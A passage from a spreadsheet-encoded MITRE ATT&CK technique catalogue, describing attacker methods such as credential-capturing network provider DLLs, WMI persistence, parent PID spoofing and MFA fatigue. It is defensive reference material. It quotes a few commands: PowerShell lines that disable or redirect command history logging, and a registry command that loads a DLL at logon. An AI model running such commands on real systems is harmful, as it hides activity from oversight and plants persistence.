On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. &lt;code&gt;no logging&lt;/code&gt;).
https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>T1556.008</t>
  </si>
  <si>
    <t>Network Provider DLL</t>
  </si>
  <si>
    <t>Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) 
Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)
Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)
https://attack.mitre.org/techniques/T1556/008</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe`  –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).
https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)
https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>T1496.004</t>
  </si>
  <si>
    <t>Cloud Service Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. 
For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)
In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability.
https://attack.mitre.org/techniques/T1496/004</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider.
https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.  
Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)
Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.
https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)
https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>T1621</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation</t>
  </si>
  <si>
    <t>Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Host Software Binary</t>
  </si>
  <si>
    <t>Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>T1552.008</t>
  </si>
  <si>
    <t>Chat Messages</t>
  </si>
  <si>
    <t>Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).
https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)
https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)
Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)
Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.
https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
For example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.
Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)
https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
